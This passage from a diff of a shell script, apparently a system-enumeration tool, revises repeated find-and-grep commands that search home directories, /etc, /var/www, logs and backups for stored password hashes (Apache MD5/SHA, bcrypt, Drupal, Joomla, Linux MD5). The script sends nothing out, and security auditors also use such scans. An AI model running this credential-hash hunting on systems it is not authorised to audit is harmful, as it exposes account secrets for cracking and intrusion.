"\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Apache SHA (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\{SHA\}[0-9a-zA-Z/_=]{10,}~${SED_RED}~" & +print_3title_no_nl "Searching Apache SHA (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\{SHA\}[0-9a-zA-Z/_=]{10,}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Blowfish (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*~${SED_RED}~" & +print_3title_no_nl "Searching Blowfish (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Drupal (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$S\$[a-zA-Z0-9_/\.]{52}~${SED_RED}~" & +print_3title_no_nl "Searching Drupal (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "\$S\$[a-zA-Z0-9_/\.]{52}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Joomlavbulletin (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}~${SED_RED}~" & +print_3title_no_nl "Searching Joomlavbulletin (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Linux MD5 (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}~${SED_RED}~" & -timeout 120 find /Applications -type 